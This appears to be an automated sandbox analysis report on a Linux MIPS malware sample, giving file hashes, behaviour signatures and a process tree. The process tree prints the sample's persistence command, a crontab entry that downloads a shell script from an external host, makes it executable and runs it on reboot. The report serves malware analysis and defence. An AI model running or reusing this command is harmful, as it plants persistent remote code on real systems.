Analysis

  • max time kernel
    143s
  • max time network
    140s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    27-10-2024 02:24

General

  • Target

    5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf

  • Size

    99KB

  • MD5

    36e86bb02185647aa672a226e7fe224f

  • SHA1

    66de8267b6fbef3423a21ed56e1fd68265882666

  • SHA256

    5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb

  • SHA512

    011ca601c3481c0ef30b4f3481e88dd05e329f1e129229cf5921e6ebf5b78806d6c8568a25ad0dd62cfd790e97fbf3d74efc047a457245647ebc939814c88cf0

  • SSDEEP

    1536:F6KyNOhiWfjZsF1LtLGgZRSKRSaySRUUkvjMS1BEYoiueZ9DWK+FSn+:fzh1slGgCvjMS1KdC+w+

Malware Config

Signatures

  • File and Directory Permissions Modification (1 TTPs, 1 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself (1 IoCs)
  • Unexpected DNS network traffic destination (2 IoCs)

    Network traffic to servers other than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job (1 TTPs, 1 IoCs)

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name (1 IoCs)
  • Reads runtime system information (3 IoCs)

    Reads data from the /proc virtual filesystem.

Processes

  • /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
    /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:709
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:711
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:713
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:714

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.dQCYhx

    Filesize

    306B

    MD5

    f3ce9d7a4a91e5fd83d71554c65e28dd

    SHA1

    92f5357290d7c8b4d7f31552e22f6c0c7b2c1248

    SHA256

    31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf

    SHA512

    11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0